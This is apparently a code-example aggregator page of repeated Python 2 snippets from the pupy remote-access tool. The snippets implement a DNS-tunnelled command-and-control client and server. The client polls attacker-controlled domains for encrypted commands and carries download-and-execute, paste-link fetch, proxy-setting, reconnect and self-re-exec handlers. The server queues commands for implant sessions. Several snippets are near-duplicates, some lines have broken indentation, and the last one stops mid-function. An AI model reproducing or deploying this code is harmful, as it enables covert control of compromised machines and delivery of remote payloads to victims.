Ejemplo n.º 1
0
    def __init__(self, domain, key):
        self.domains = domain.split(',')
        self.domain_id = 0
        self.domain = self.domains[self.domain_id]
        self.translation = dict(zip(
            ''.join([
                ''.join([chr(x) for x in xrange(ord('A'), ord('Z') + 1)]),
                ''.join([chr(x) for x in xrange(ord('0'), ord('9') + 1)]),
                '=',
            ]),
            ''.join([
                ''.join([chr(x) for x in xrange(ord('a'), ord('z') + 1)]),
                '-',
                ''.join([chr(x) for x in xrange(ord('0'), ord('9') + 1)]),
            ])))
        self.encoder = ECPV(public_key=key)
        self.spi = None
        self.kex = None
        self.nonce = random.randrange(0, 1<<32-1)
        self.poll = 60
        self.active = True
        self.failed = 0
        self.proxy = None

        Thread.__init__(self)
Ejemplo n.º 2
0
    def __init__(self, domain, key, recursor=None, timeout=None):
        self.sessions = {}
        self.domain = domain
        self.recursor = recursor
        self.encoder = ECPV(private_key=key)
        self.translation = dict(
            zip(
                ''.join([
                    ''.join([chr(x) for x in xrange(ord('a'),
                                                    ord('z') + 1)]),
                    '-',
                    ''.join([chr(x) for x in xrange(ord('0'),
                                                    ord('9') + 1)]),
                ]), ''.join([
                    ''.join([chr(x) for x in xrange(ord('A'),
                                                    ord('Z') + 1)]),
                    ''.join([chr(x) for x in xrange(ord('0'),
                                                    ord('9') + 1)]),
                    '=',
                ])))

        self.interval = 30
        self.kex = True
        self.timeout = timeout or self.interval * 3
        self.commands = []
        self.lock = RLock()
        self.finished = Event()
Ejemplo n.º 3
0
    def __init__(self, domain, key, recursor=None, timeout=None):
        self.sessions = {}
        self.domain = domain
        self.recursor = recursor
        self.encoder = ECPV(private_key=key)
        self.translation = dict(zip(
            ''.join([
                ''.join([chr(x) for x in xrange(ord('a'), ord('z') + 1)]),
                '-',
                ''.join([chr(x) for x in xrange(ord('0'), ord('9') + 1)]),
            ]),
            ''.join([
                ''.join([chr(x) for x in xrange(ord('A'), ord('Z') + 1)]),
                ''.join([chr(x) for x in xrange(ord('0'), ord('9') + 1)]),
                '=',
            ])))

        self.interval = 30
        self.kex = True
        self.timeout = timeout or self.interval*3
        self.commands = []
        self.lock = RLock()
        self.finished = Event()
Ejemplo n.º 4
0
class DnsCommandsClient(Thread):
    def __init__(self, domain, key):
        self.domains = domain.split(',')
        self.domain_id = 0
        self.domain = self.domains[self.domain_id]
        self.translation = dict(zip(
            ''.join([
                ''.join([chr(x) for x in xrange(ord('A'), ord('Z') + 1)]),
                ''.join([chr(x) for x in xrange(ord('0'), ord('9') + 1)]),
                '=',
            ]),
            ''.join([
                ''.join([chr(x) for x in xrange(ord('a'), ord('z') + 1)]),
                '-',
                ''.join([chr(x) for x in xrange(ord('0'), ord('9') + 1)]),
            ])))
        self.encoder = ECPV(public_key=key)
        self.spi = None
        self.kex = None
        self.nonce = random.randrange(0, 1<<32-1)
        self.poll = 60
        self.active = True
        self.failed = 0

        Thread.__init__(self)

    def next(self):
        self.domain_id = ( self.domain_id + 1 ) % len(self.domains)
        self.domain = self.domains[self.domain_id]
        self.failed = 0

    def _a_page_decoder(self, addresses, nonce, symmetric=None):
        if symmetric is None:
            symmetric = self.encoder.kex_completed

        resp = len(addresses)*[None]
        for address in addresses:
            raw = 0
            for part in [ int(x) << (3-i)*8 for i,x in enumerate(address.split('.')) ]:
                raw |= part

            idx = (raw & 0x1E000000) >> 25
            bits = (raw & 0x01FFFFFE) >> 1
            resp[idx] = struct.pack('>I', bits)[1:]

        data = b''.join(resp)
        length = struct.unpack_from('B', data)[0]
        payload = data[1:1+length]

        decoded = None

        try:
            decoded = self.encoder.decode(payload, nonce, symmetric)
        except Exception as e:
            logging.exception(e)
            raise DnsCommandClientDecodingError

        return decoded

    def _q_page_encoder(self, data):
        if len(data) > 35:
            raise ValueError('Too big page size')

        nonce = self.nonce
        encoded = '.'.join([
            ''.join([
                self.translation[x] for x in base64.b32encode(part)
            ]) for part in [
                struct.pack('>I', self.spi) if self.spi else None,
                struct.pack('>I', nonce),
                self.encoder.encode(data, nonce, symmetric=True)
            ] if part is not None
        ]) + '.' + self.domain

        self.nonce += len(encoded)
        return encoded, nonce

    def _request(self, *commands):
        parcel = Parcel(*commands)
        page, nonce = self._q_page_encoder(parcel.pack())

        try:
            _, _, addresses = socket.gethostbyname_ex(page)
            if len(addresses) < 2:
                logging.warning('DNSCNC: short answer: {}'.format(addresses))
                return []

        except socket.error as e:
            logging.error('DNSCNC: Communication error: {}'.format(e))
            self.next()
            return []

        response = None

        try:
            response = Parcel.unpack(
                self._a_page_decoder(addresses, nonce)
            )

            self.failed = 0
        except ParcelInvalidCrc:
            logging.error('CRC FAILED / Fallback to Public-key decoding')

            try:
                response = Parcel.unpack(
                    self._a_page_decoder(addresses, nonce, False)
                )

                self.spi = None
                self.encoder.kex_reset()

            except ParcelInvalidCrc:
                logging.error(
                    'CRC FAILED / Fallback failed also / CRC / {}/{}'.format(
                        self.failed, 5
                    )
                )
                self.failed += 1
                if self.failed > 5:
                    self.next()
                return []

            except ParcelInvalidPayload:
                logging.error(
                    'CRC FAILED / Fallback failed also / Invalid payload / {}/{}'.format(
                        self.failed, 5
                    )
                )
                self.failed += 1
                if self.failed > 5:
                    self.next()
                return []

        return response.commands

    def on_pastelink(self, url, action, encoder):
        proxy = urllib2.ProxyHandler()
        opener = urllib2.build_opener(proxy)
        response = opener.open(url)
        if response.code == 200:
            try:
                content = response.read()
                content = ascii85.ascii85DecodeDG(content)
                content = self.encoder.unpack(content)
                content = zlib.decompress(content)
                chash, content = content[:20], content[20:]
                h = hashlib.sha1()
                h.update(content)
                if h.digest() == chash:
                    self.on_pastelink_content(url, action, content)
                else:
                    logging.error('PasteLink: Wrong hash after extraction: {} != {}'.format(
                        h.digest(), chash))
            except Exception as e:
                logging.exception(e)

    def on_downloadexec(self, url, action, use_proxy):
        if use_proxy:
            opener = urllib2.build_opener(urllib2.ProxyHandler()).open
        else:
            opener = urllib2.urlopen

        try:
            response = opener(url)
            if response.code == 200:
                self.on_downloadexec_content(url, action, response.read())

        except Exception as e:
            logging.exception(e)

    def on_pastelink_content(self, url, action, content):
        pass

    def on_downloadexec_content(self, url, action, content):
        pass

    def on_connect(self, ip, port, transport):
        pass

    def on_checkconnect(self, host, port_start, port_end=None):
        pass

    def on_exit(self):
        self.active = False

    def on_disconnect(self):
        pass

    def on_error(self, error, message=None):
        pass

    def process(self):
        if self.spi:
            commands = list(self._request(SystemStatus()))
        else:
            commands = list(self._request(Poll()))

    	logging.debug('commands: {}'.format(commands))
        ack = self._request(Ack(len(commands)))
        if not ( len(ack) == 1 and isinstance(ack[0], Ack)):
            logging.error('ACK <-> ACK failed: received: {}'.format(ack))

        for command in commands:
            responses = []
            if isinstance(command, Policy):
                self.poll = command.poll

                if command.kex and not self.spi:
                    request = self.encoder.generate_kex_request()
                    kex = Kex(request)
                    response = self._request(kex)
                    if not len(response) == 1 or not isinstance(response[0], Kex):
                    	logging.error('KEX sequence failed. Got {} instead of Kex'.format(
                            response))
                        return

                    key = self.encoder.process_kex_response(response[0].parcel)
                    self.spi = kex.spi
            elif isinstance(command, Poll):
                ack = self._request(SystemInfo())
                if not len(response) == 1 and not isinstance(response[0], Ack):
                    logging.error('SystemInfo: ACK expected but {} found'.format(
                        response))
                ack = self._request(SystemStatus())
                if not len(response) == 1 and not isinstance(response[0], Ack):
                    logging.error('SystemInfo: ACK expected but {} found'.format(
                        response))
            elif isinstance(command, PasteLink):
                self.on_pastelink(command.url, command.action, self.encoder)
            elif isinstance(command, DownloadExec):
                self.on_downloadexec(command.url, command.action, command.proxy)
            elif isinstance(command, Connect):
                self.on_connect(command.ip, command.port, transport=command.transport)
            elif isinstance(command, Error):
                self.on_error(command.error, command.message)
            elif isinstance(command, Disconnect):
                self.on_disconnect()
            elif isinstance(command, Sleep):
                time.sleep(command.timeout)
            elif isinstance(command, CheckConnect):
                self.on_checkconnect(command.host, command.port_start, port_end=command.port_end)
            elif isinstance(command, Reexec):
                executable = os.readlink('/proc/self/exe')
                args = open('/proc/self/cmdline').read().split('\x00')
                os.execv(executable, args)
            elif isinstance(command, Exit):
                self.active = False
                self.on_exit()

    def run(self):
        while True:
            try:
                self.process()
            except Exception as e:
                logging.exception(e)

            if self.active:
            	logging.debug('sleep {}'.format(self.poll))
                time.sleep(self.poll)
            else:
                break
Ejemplo n.º 5
0
class DnsCommandServerHandler(BaseResolver):
    def __init__(self, domain, key, recursor=None, timeout=None):
        self.sessions = {}
        self.domain = domain
        self.recursor = recursor
        self.encoder = ECPV(private_key=key)
        self.translation = dict(
            zip(
                ''.join([
                    ''.join([chr(x) for x in xrange(ord('a'),
                                                    ord('z') + 1)]),
                    '-',
                    ''.join([chr(x) for x in xrange(ord('0'),
                                                    ord('9') + 1)]),
                ]), ''.join([
                    ''.join([chr(x) for x in xrange(ord('A'),
                                                    ord('Z') + 1)]),
                    ''.join([chr(x) for x in xrange(ord('0'),
                                                    ord('9') + 1)]),
                    '=',
                ])))

        self.interval = 30
        self.kex = True
        self.timeout = timeout or self.interval * 3
        self.commands = []
        self.lock = RLock()
        self.finished = Event()

    def cleanup(self):
        while not self.finished.is_set():
            with self.lock:
                to_remove = []
                for spi, session in self.sessions.iteritems():
                    if session.idle > self.timeout:
                        to_remove.append(spi)
                for spi in to_remove:
                    del self.sessions[spi]

                self.cache = {}

            time.sleep(self.timeout)

    def locked(f):
        @functools.wraps(f)
        def wrapped(self, *args, **kwargs):
            with self.lock:
                return f(self, *args, **kwargs)

        return wrapped

    @locked
    def add_command(self, command, session=None, default=False):
        if default:
            self.commands.append(command)

        if session:
            sessions = self.find_sessions(spi=session) or \
              self.find_sessions(node=session)

            if not sessions:
                return 0

            count = 0
            if type(sessions) in (list, tuple):
                for session in sessions:
                    session.add_command(command)
                    count += 1
            else:
                count = 1
                sessions.add_command(command)

            return count
        else:
            count = 0
            for session in self.find_sessions():
                session.add_command(command)
                count += 1

            return count

    @locked
    def reset_commands(self, session=None, default=False):
        if session:
            if type(session) in (str, unicode):
                session = int(session, 16)

        if default:
            self.commands = []

        if session:
            sessions = self.find_sessions(spi=session) or \
              self.find_sessions(node=session)

            if not sessions:
                return 0

            count = 0
            if type(sessions) in (list, tuple):
                for session in sessions:
                    session.commands = []
                    count += 1
            else:
                count = 1
                sessions.commands = []

            return count
        else:
            count = 0
            for session in self.find_sessions():
                if session.commands:
                    session.commands = []
                    count += 1
            return count

    @locked
    def find_sessions(self, spi=None, node=None):
        if spi:
            if type(spi) in (str, unicode):
                spi = [int(x, 16) for x in spi.split(',')]
            elif type(spi) == int:
                spi = [spi]

        if node:
            if type(node) in (str, unicode):
                node = [int(x, 16) for x in node.split(',')]
            elif type(node) == int:
                node = [node]

        if not (spi or node):
            return [
                session for session in self.sessions.itervalues() \
                if session.system_info is not None
            ]
        elif spi:
            return [self.sessions.get(x) for x in spi if x in self.sessions]
        elif node:
            return [
                session for session in self.sessions.itervalues() \
                    if session.system_info and \
                        session.system_info['node'] in set(node)
            ]

    @locked
    def set_policy(self, kex=True, timeout=None, interval=None, node=None):
        if kex == self.kex and self.timeout == timeout and self.interval == self.interval:
            return

        if interval and interval < 30:
            raise ValueError(
                'Interval should not be less then 30s to avoid DNS storm')

        if node and (interval or timeout):
            session = self.find_sessions(spi=node) or self.find_sessions(
                node=node)

            if session:
                session = session[0]

                if interval:
                    session.timeout = (interval * 3)
                else:
                    interval = self.interval

                if timeout:
                    session.timeout = timeout

                if kex is None:
                    kex = self.kex

        else:
            self.interval = interval or self.interval
            self.timeout = max(timeout if timeout else self.timeout,
                               self.interval * 3)
            self.kex = kex if (kex is not None) else self.kex

            interval = self.interval
            timeout = self.timeout
            kex = self.kex

        cmd = Policy(interval, kex)
        return self.add_command(cmd, session=node)

    @locked
    def encode_pastelink_content(self, content):
        h = hashlib.sha1()
        h.update(content)

        content = h.digest() + content
        content = zlib.compress(content, 9)
        content = self.encoder.pack(content)
        content = ascii85.ascii85EncodeDG(content)

        return content

    def on_connect(self, info):
        pass

    def on_keep_alive(self, info):
        pass

    def on_exit(self, info):
        pass

    def _a_page_encoder(self, data, encoder, nonce):
        data = encoder.encode(data, nonce, symmetric=encoder.kex_completed)

        length = struct.pack('B', len(data))
        payload = length + data

        if len(payload) > 48:
            raise ValueError('Page size more than 45 bytes ({})'.format(
                len(payload)))

        response = []

        for idx, part in enumerate(
            [payload[i:i + 3] for i in xrange(0, len(payload), 3)]):
            header = (random.randint(1, 6) << 29)
            idx = idx << 25
            bits = (struct.unpack(
                '>I', '\x00' + part + chr(random.randrange(0, 255)) *
                (3 - len(part)))[0]) << 1
            packed = struct.unpack(
                '!BBBB',
                struct.pack('>I',
                            header | idx | bits | int(not bool(bits & 6))))
            address = '.'.join(['{}'.format(int(x)) for x in packed])
            response.append(RR('.', QTYPE.A, rdata=A(address), ttl=600))

        return response

    def _q_page_decoder(self, data):
        parts = data.stripSuffix(self.domain).idna()[:-1].split('.')

        if len(parts) == 0:
            raise DnsPingRequest(1)
        elif len(parts) == 1 and parts[0].startswith('ping'):
            if len(parts[0]) == 4:
                raise DnsPingRequest(15)
            else:
                raise DnsPingRequest(int(parts[0][4:]))

        elif len(parts) not in (2, 3):
            raise DnsNoCommandServerException()

        parts = [
            base64.b32decode(''.join([self.translation[x] for x in part]))
            for part in parts
        ]

        if len(parts) == 2:
            nonce, data = parts
            nonce = struct.unpack('>I', nonce)[0]
            encoder = self.encoder
            session = None
        elif len(parts) == 3:
            spi, nonce, data = parts
            spi = struct.unpack('>I', spi)[0]
            nonce = struct.unpack('>I', nonce)[0]
            session = None
            with self.lock:
                if not spi in self.sessions:
                    raise DnsCommandServerException('NO_SESSION', nonce)
                session = self.sessions[spi]
            encoder = session.encoder

        return encoder.decode(data, nonce, symmetric=True), session, nonce

    def _cmd_processor(self, command, session):
        logging.debug('dnscnc:commands={} session={}'.format(command, session))

        if isinstance(command, Poll) and session is None:
            return [Policy(self.interval, self.kex), Poll()]

        elif isinstance(command, Ack) and (session is None):
            return [Ack()]

        elif isinstance(command, Exit):
            if session and session.system_info:
                self.on_exit(session.system_info)

            with self.lock:
                del self.sessions[session.spi]

            return [Exit()]

        elif (isinstance(command, Poll)
              or isinstance(command, SystemStatus)) and (session is not None):
            if session.system_info:
                self.on_keep_alive(session.system_info)

            if isinstance(command, SystemStatus):
                session.system_status = command.get_dict()

            commands = session.commands
            return commands

        elif isinstance(command, Ack) and (session is not None):
            if session.system_info:
                self.on_keep_alive(session.system_info)

            if command.amount > len(session.commands):
                logging.info('ACK: invalid amount of commands: {} > {}'.format(
                    command.amount, len(session.commands)))
            session.commands = session.commands[command.amount:]
            return [Ack()]

        elif isinstance(command, SystemInfo) and session is not None:
            session.system_info = command.get_dict()
            return [Ack()]

        elif isinstance(command, Kex):
            with self.lock:
                response = []

                if not command.spi in self.sessions:
                    self.sessions[command.spi] = Session(
                        command.spi, self.encoder.clone(), self.commands,
                        self.timeout)

                encoder = self.sessions[command.spi].encoder
                response, key = encoder.process_kex_request(command.parcel)
                logging.debug('dnscnc:kex:key={}'.format(
                    binascii.b2a_hex(key[0])))

            return [Kex(response)]
        else:
            return [Error('NO_POLICY')]

    def resolve(self, request, handler):
        if request.q.qtype != QTYPE.A:
            reply = request.reply()
            reply.header.rcode = RCODE.NXDOMAIN
            logging.debug('Request unknown qtype: {}'.format(
                QTYPE.get(request.q.qtype)))
            return reply

        with self.lock:
            data = request.q.qname
            part = data.stripSuffix(self.domain).idna()[:-1]
            if part in self.cache:
                response = self.cache[part]
                response.header.id = request.header.id
                return self.cache[part]

            response = self._resolve(request, handler)
            self.cache[part] = response
            return response

    def _resolve(self, request, handler):
        qname = request.q.qname
        reply = request.reply()

        # TODO:
        # Resolve NS?, DS, SOA somehow
        if not qname.matchSuffix(self.domain):
            if self.recursor:
                try:
                    return DNSRecord.parse(
                        request.send(self.recursor, timeout=2))
                except socket.error:
                    pass
                except Exception as e:
                    logging.exception('DNS request forwarding failed')

            reply.header.rcode = RCODE.NXDOMAIN
            return reply

        responses = []

        session = None
        nonce = None

        try:
            request, session, nonce = self._q_page_decoder(qname)
            if session and session.last_nonce and session.last_qname:
                if nonce < session.last_nonce:
                    logging.info('Ignore nonce from past: {} < {}'.format(
                        nonce, session.last_nonce))
                    reply.header.rcode = RCODE.NXDOMAIN
                    return reply
                elif session.last_nonce == nonce and session.last_qname != qname:
                    logging.info(
                        'Last nonce but different qname: {} != {}'.format(
                            session.last_qname, qname))
                    reply.header.rcode = RCODE.NXDOMAIN
                    return reply

            for command in Parcel.unpack(request):
                for response in self._cmd_processor(command, session):
                    responses.append(response)

            if session:
                session.last_nonce = nonce
                session.last_qname = qname

        except DnsCommandServerException as e:
            nonce = e.nonce
            responses = [e.error, Policy(self.interval, self.kex), Poll()]

        except ParcelInvalidCrc as e:
            responses = [e.error]

        except DnsNoCommandServerException:
            reply.header.rcode = RCODE.NXDOMAIN
            return reply

        except DnsPingRequest, e:
            for i in xrange(e.args[0]):
                x = (i % 65536) >> 8
                y = i % 256
                a = RR('.',
                       QTYPE.A,
                       rdata=A('127.0.{}.{}'.format(x, y)),
                       ttl=10)
                a.rname = qname
                reply.add_answer(a)

            return reply

        except TypeError:
            # Usually - invalid padding
            reply.header.rcode = RCODE.NXDOMAIN
            return reply
Ejemplo n.º 6
0
    def __init__(self, domain, key, ns=None, qtype='A', ns_proto=socket.SOCK_DGRAM, ns_timeout=3):
        try:
            import pupy
            self.pupy = pupy
            self.cid = pupy.cid
        except:
            self.pupy = None
            self.cid = 31337

        self.iid = os.getpid() % 65535

        if ns and dnslib:
            if not type(ns) in (list, tuple):
                ns = ns.split(':')
                if len(ns) == 1:
                    ns = (ns[0], 53)
                elif len(ns) == 2:
                    ns = ns[0], int(ns[1])
                else:
                    raise ValueError('Invalid NS address: {}'.format(ns))

            self.ns = ns
            self.ns_proto = ns_proto
            self.ns_socket = None
            self.ns_timeout = ns_timeout
            self.ns_socket_lock = Lock()
            self.qtype = qtype
            self.resolve = self._dnslib_resolve
        else:
            if ns:
                logging.error('dnslib not available, use system resolver')

            self.ns = None
            self.ns_socket = None
            self.qtype = None
            self.ns_timeout = None
            self.resolve = self._native_resolve

        self.node = uuid.getnode()
        self.nonce = from_bytes(get_random_bytes(4))
        self.domains = domain.split(',')
        self.domain_id = 0
        self.domain = self.domains[self.domain_id]
        self.translation = dict(zip(
            ''.join([
                ''.join([chr(x) for x in xrange(ord('A'), ord('Z') + 1)]),
                ''.join([chr(x) for x in xrange(ord('0'), ord('9') + 1)]),
                '=',
            ]),
            ''.join([
                ''.join([chr(x) for x in xrange(ord('a'), ord('z') + 1)]),
                '-',
                ''.join([chr(x) for x in xrange(ord('0'), ord('9') + 1)]),
            ])))

        self.encoder = ECPV(public_key=key, curve='brainpoolP224r1')
        self.spi = None
        self.kex = None
        self.poll = 60
        self.active = True
        self.failed = 0
        self.proxy = None
        self._request_lock = Lock()

        Thread.__init__(self)
Ejemplo n.º 7
0
class DnsCommandsClient(Thread):
    def __init__(self, domain, key):
        self.domains = domain.split(',')
        self.domain_id = 0
        self.domain = self.domains[self.domain_id]
        self.translation = dict(zip(
            ''.join([
                ''.join([chr(x) for x in xrange(ord('A'), ord('Z') + 1)]),
                ''.join([chr(x) for x in xrange(ord('0'), ord('9') + 1)]),
                '=',
            ]),
            ''.join([
                ''.join([chr(x) for x in xrange(ord('a'), ord('z') + 1)]),
                '-',
                ''.join([chr(x) for x in xrange(ord('0'), ord('9') + 1)]),
            ])))
        self.encoder = ECPV(public_key=key)
        self.spi = None
        self.kex = None
        self.nonce = random.randrange(0, 1<<32-1)
        self.poll = 60
        self.active = True
        self.failed = 0
        self.proxy = None

        Thread.__init__(self)

    def next(self):
        self.domain_id = ( self.domain_id + 1 ) % len(self.domains)
        self.domain = self.domains[self.domain_id]
        self.failed = 0

    def _a_page_decoder(self, addresses, nonce, symmetric=None):
        if symmetric is None:
            symmetric = self.encoder.kex_completed

        resp = len(addresses)*[None]
        for address in addresses:
            raw = 0
            for part in [ int(x) << (3-i)*8 for i,x in enumerate(address.split('.')) ]:
                raw |= part

            idx = (raw & 0x1E000000) >> 25
            bits = (raw & 0x01FFFFFE) >> 1
            resp[idx] = struct.pack('>I', bits)[1:]

        data = b''.join(resp)
        length = struct.unpack_from('B', data)[0]
        payload = data[1:1+length]

        decoded = None

        try:
            decoded = self.encoder.decode(payload, nonce, symmetric)
        except Exception as e:
            logging.exception(e)
            raise DnsCommandClientDecodingError

        return decoded

    def _q_page_encoder(self, data):
        if len(data) > 35:
            raise ValueError('Too big page size')

        nonce = self.nonce
        encoded = '.'.join([
            ''.join([
                self.translation[x] for x in base64.b32encode(part)
            ]) for part in [
                struct.pack('>I', self.spi) if self.spi else None,
                struct.pack('>I', nonce),
                self.encoder.encode(data, nonce, symmetric=True)
            ] if part is not None
        ]) + '.' + self.domain

        self.nonce += len(encoded)
        return encoded, nonce

    def _request(self, *commands):
        parcel = Parcel(*commands)
        page, nonce = self._q_page_encoder(parcel.pack())

        try:
            _, _, addresses = socket.gethostbyname_ex(page)
            if len(addresses) < 2:
                logging.warning('DNSCNC: short answer: {}'.format(addresses))
                return []

        except socket.error as e:
            logging.error('DNSCNC: Communication error: {}'.format(e))
            self.next()
            return []

        response = None

        try:
            response = Parcel.unpack(
                self._a_page_decoder(addresses, nonce)
            )

            self.failed = 0
        except ParcelInvalidCrc:
            logging.error('CRC FAILED / Fallback to Public-key decoding')

            try:
                response = Parcel.unpack(
                    self._a_page_decoder(addresses, nonce, False)
                )

                self.spi = None
                self.encoder.kex_reset()
                self.on_session_lost()

            except ParcelInvalidCrc:
                logging.error(
                    'CRC FAILED / Fallback failed also / CRC / {}/{}'.format(
                        self.failed, 5
                    )
                )
                self.failed += 1
                if self.failed > 5:
                    self.next()
                return []

            except ParcelInvalidPayload:
                logging.error(
                    'CRC FAILED / Fallback failed also / Invalid payload / {}/{}'.format(
                        self.failed, 5
                    )
                )
                self.failed += 1
                if self.failed > 5:
                    self.next()
                return []

        return response.commands

    def on_pastelink(self, url, action, encoder):
        proxy = urllib2.ProxyHandler()
        opener = urllib2.build_opener(proxy)
        response = opener.open(url)
        if response.code == 200:
            try:
                content = response.read()
                content = ascii85.ascii85DecodeDG(content)
                content = self.encoder.unpack(content)
                content = zlib.decompress(content)
                chash, content = content[:20], content[20:]
                h = hashlib.sha1()
                h.update(content)
                if h.digest() == chash:
                    self.on_pastelink_content(url, action, content)
                else:
                    logging.error('PasteLink: Wrong hash after extraction: {} != {}'.format(
                        h.digest(), chash))
            except Exception as e:
                logging.exception(e)

    def on_downloadexec(self, url, action, use_proxy):
        if use_proxy:
            opener = urllib2.build_opener(urllib2.ProxyHandler()).open
        else:
            opener = urllib2.urlopen

        try:
            response = opener(url)
            if response.code == 200:
                self.on_downloadexec_content(url, action, response.read())

        except Exception as e:
            logging.exception(e)

    def on_pastelink_content(self, url, action, content):
        pass

    def on_downloadexec_content(self, url, action, content):
        pass

    def on_connect(self, ip, port, transport):
        pass

    def on_checkconnect(self, host, port_start, port_end=None):
        pass

    def on_exit(self):
        self.active = False

    def on_disconnect(self):
        pass

    def on_error(self, error, message=None):
        pass

    def on_session_established(self):
        pass

    def on_session_lost(self):
        pass

    def on_set_proxy(self, scheme, ip, port, user, password):
        if not scheme or scheme.lower() == 'none':
            self.proxy = None
        elif scheme.lower() == 'any':
            self.proxy = True
        else:
            if user and password:
                auth = '{}:{}@'.format(user, password)
            else:
                auth = ''

            self.proxy = '{}://{}{}:{}'.format(scheme, auth, ip, port)

    def process(self):
        if self.spi:
            commands = list(self._request(SystemStatus()))
        else:
            commands = list(self._request(Poll()))

    	logging.debug('commands: {}'.format(commands))
        ack = self._request(Ack(len(commands)))
        if not ( len(ack) == 1 and isinstance(ack[0], Ack)):
            logging.error('ACK <-> ACK failed: received: {}'.format(ack))

        for command in commands:
            responses = []
            if isinstance(command, Policy):
                self.poll = command.poll

                if command.kex and not self.spi:
                    request = self.encoder.generate_kex_request()
                    kex = Kex(request)
                    response = self._request(kex)
                    if not len(response) == 1 or not isinstance(response[0], Kex):
                    	logging.error('KEX sequence failed. Got {} instead of Kex'.format(
                            response))
                        return

                    key = self.encoder.process_kex_response(response[0].parcel)
                    self.spi = kex.spi
                    self.on_session_established()
            elif isinstance(command, Poll):
                ack = self._request(SystemInfo())
                if not len(response) == 1 and not isinstance(response[0], Ack):
                    logging.error('SystemInfo: ACK expected but {} found'.format(
                        response))
                ack = self._request(SystemStatus())
                if not len(response) == 1 and not isinstance(response[0], Ack):
                    logging.error('SystemInfo: ACK expected but {} found'.format(
                        response))
            elif isinstance(command, PasteLink):
                self.on_pastelink(command.url, command.action, self.encoder)
            elif isinstance(command, DownloadExec):
                self.on_downloadexec(command.url, command.action, command.proxy)
            elif isinstance(command, SetProxy):
                self.on_set_proxy(
                    command.scheme, command.ip, command.port,
                    command.user, command.password
                )
            elif isinstance(command, Connect):
                self.on_connect(
                    str(command.ip),
                    int(command.port),
                    transport=command.transport,
                    proxy=self.proxy
                )
            elif isinstance(command, Error):
                self.on_error(command.error, command.message)
            elif isinstance(command, Disconnect):
                self.on_disconnect()
            elif isinstance(command, Sleep):
                time.sleep(command.timeout)
            elif isinstance(command, CheckConnect):
                self.on_checkconnect(command.host, command.port_start, port_end=command.port_end)
            elif isinstance(command, Reexec):
                executable = os.readlink('/proc/self/exe')
                args = open('/proc/self/cmdline').read().split('\x00')
                os.execv(executable, args)
            elif isinstance(command, Exit):
                self.active = False
                self.on_exit()

    def run(self):
        while True:
            try:
                self.process()
            except Exception as e:
                logging.exception(e)

            if self.active:
            	logging.debug('sleep {}'.format(self.poll))
                time.sleep(self.poll)
            else:
                break
Ejemplo n.º 8
0
class DnsCommandServerHandler(BaseResolver):
    def __init__(self, domain, key, recursor=None, timeout=None):
        self.sessions = {}
        self.domain = domain
        self.recursor = recursor
        self.encoder = ECPV(private_key=key)
        self.translation = dict(zip(
            ''.join([
                ''.join([chr(x) for x in xrange(ord('a'), ord('z') + 1)]),
                '-',
                ''.join([chr(x) for x in xrange(ord('0'), ord('9') + 1)]),
            ]),
            ''.join([
                ''.join([chr(x) for x in xrange(ord('A'), ord('Z') + 1)]),
                ''.join([chr(x) for x in xrange(ord('0'), ord('9') + 1)]),
                '=',
            ])))

        self.interval = 30
        self.kex = True
        self.timeout = timeout or self.interval*3
        self.commands = []
        self.lock = RLock()
        self.finished = Event()

    def cleanup(self):
        while not self.finished.is_set():
            with self.lock:
                to_remove = []
                for spi, session in self.sessions.iteritems():
                    if session.idle > self.timeout:
                        to_remove.append(spi)
                for spi in to_remove:
                    del self.sessions[spi]

                self.cache = {}

            time.sleep(self.timeout)

    def locked(f):
        @functools.wraps(f)
        def wrapped(self, *args, **kwargs):
            with self.lock:
                return f(self, *args, **kwargs)
        return wrapped

    @locked
    def add_command(self, command, session=None, default=False):
        if default:
            self.commands.append(command)

        if session:
            sessions = self.find_sessions(spi=session) or \
              self.find_sessions(node=session)

            if not sessions:
                return 0

            count = 0
            if type(sessions) in (list, tuple):
                for session in sessions:
                    session.add_command(command)
                    count += 1
            else:
                count = 1
                sessions.add_command(command)

            return count
        else:
            count = 0
            for session in self.find_sessions():
                session.add_command(command)
                count += 1

            return count

    @locked
    def reset_commands(self, session=None, default=False):
        if default:
            self.commands = []

        if session:
            sessions = self.find_sessions(spi=session) or \
              self.find_sessions(node=session)

            if not sessions:
                return 0

            count = 0
            if type(sessions) in (list, tuple):
                for session in sessions:
                    session.commands = []
                    count += 1
            else:
                count = 1
                sessions.commands = []

            return count
        else:
            count = 0
            for session in self.find_sessions():
                if session.commands:
                    session.commands = []
                    count += 1
            return count

    @locked
    def find_sessions(self, spi=None, node=None):
        if spi:
            if type(spi) in (str,unicode):
                spi = [ int(x, 16) for x in spi.split(',') ]
            elif type(spi) == int:
                spi = [ spi ]

        if node:
            if type(node) in (str,unicode):
                node = [ int(x, 16) for x in node.split(',') ]
            elif type(node) == int:
                node = [ node ]

        if not (spi or node):
            return [
                session for session in self.sessions.itervalues() \
                if session.system_info is not None
            ]
        elif spi:
            return [
                self.sessions.get(x) for x in spi if x in self.sessions
            ]
        elif node:
            return [
                session for session in self.sessions.itervalues() \
                    if session.system_info and \
                        session.system_info['node'] in set(node)
            ]

    @locked
    def set_policy(self, kex=True, timeout=None, interval=None, node=None):
        if kex == self.kex and self.timeout == timeout and self.interval == self.interval:
            return

        if interval and interval < 30:
            raise ValueError('Interval should not be less then 30s to avoid DNS storm')

        if node and (interval or timeout):
            session = self.find_sessions(
                spi=node) or self.find_sessions(node=node)

            if session:
                session = session[0]

                if interval:
                    session.timeout = (interval*3)
                else:
                    interval = self.interval

                if timeout:
                    session.timeout = timeout

                if kex is None:
                    kex = self.kex

        else:
            self.interval = interval or self.interval
            self.timeout = max(timeout if timeout else self.timeout, self.interval*3)
            self.kex = kex if ( kex is not None ) else self.kex

            interval = self.interval
            timeout = self.timeout
            kex = self.kex

        cmd = Policy(interval, kex)
        return self.add_command(cmd, session=node)

    @locked
    def encode_pastelink_content(self, content):
        h = hashlib.sha1()
        h.update(content)

        content = h.digest() + content
        content = zlib.compress(content, 9)
        content = self.encoder.pack(content)
        content = ascii85.ascii85EncodeDG(content)

        return content

    def on_connect(self, info):
        pass

    def on_keep_alive(self, info):
        pass

    def on_exit(self, info):
        pass

    def _a_page_encoder(self, data, encoder, nonce):
        data = encoder.encode(data, nonce, symmetric=encoder.kex_completed)

        length = struct.pack('B', len(data))
        payload = length + data

        if len(payload) > 48:
            raise ValueError('Page size more than 45 bytes ({})'.format(len(payload)))

        response = []

        for idx, part in enumerate([payload[i:i+3] for i in xrange(0, len(payload), 3)]):
            header = (random.randint(1, 6) << 29)
            idx = idx << 25
